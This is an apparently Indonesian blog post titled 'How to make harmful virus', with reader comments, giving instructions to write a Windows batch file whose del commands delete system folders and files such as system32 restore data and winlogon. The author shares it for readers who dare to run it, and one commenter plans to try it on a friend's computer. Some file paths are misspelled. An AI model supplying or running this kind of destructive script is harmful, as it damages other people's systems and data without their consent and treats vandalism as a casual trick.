Blog ini sedang tidak beraktivitas lagi, karena ada hambatan tertentu, terima kasih telah mengunjungi

How to make harmful virus

saya lagi lagi memberikan anda tentang cara membuat virus, kali ini saya akan memberikan virus yang berbahaya (katanya sih).
oke saya lihat-lihat nampaknya sih virus ini berbahaya.
virus ini sangat sederhana banget.
saya gak brani nyoba virus ini hanya saja saya share buat kalian yang brani nyoba.
nih saya kasih cara membuat virusnya..
pertama buka notepad.
tulislah seperti ini
del"c:\windows\pchealth"
del"C:\windows\system"
del"C:\windows\system32\restore"
del"C:\windows\system32\autoexec.nt"
del"c:\windows\system32\ntoskrni.exe"
del"c:\windows\winlogon.exe.exe"


trus save dengan exetensi .bat


coba aja kalo berani..
hehe

8 pendapat/comment:

Damar mengatakan...

hh . . all virus make harmful.
I'm also new in virus of world.
Bingung juga kalo baca-baca masalah virus, tapi kalo buat pengetahuan ,SIP-lah...tak save artikelnya, biar lain kali bisa dipraktekkin

^_^

Adib from kompinter mengatakan...

cool man keren sob mantebbener dah !!mampir ya

Serba Serbi mengatakan...

oke moga berguna ya nie post..

hertzFREAK mengatakan...

ngeri tuh sob! nice post anyway

MF Modifier mengatakan...

waduhhh . . . ane udah trauma buat virus, dulu pernah kena kompi gw sendiri, wkwkwkwk hahahahaa

AZ COMSOFT mengatakan...

aku juga sering coba2 buat yg beginian, lihat di

http://www.az-comsoft.co.cc/2010/06/cara-membuat-virus-mematikan.html

nice info kawan...

Fajar mengatakan...

wahh..bkin penasaran, gw coba besok deh di kompi temen gw :D
nice info..

Akhyar's Blog mengatakan...

wah... trik yang bagus nih..
perlu dicoba...

Posting Komentar

terima kasih atas komentar anda
jangan lupa tinggal link anda saat berkomentar
untuk berkertik.
kirimkan keritik anda ke : freemail.denny@gmail.com
layanan online
Yahoo Messenger :rvdy_csku@yahoo.com
My Facebook : KLIK
Follow me on twitter: KLIK
respon cepat ke : 085762905411

 
Design by Free WordPress Themes | Bloggerized by Lasantha - Premium Blogger Themes | JCPenney Coupons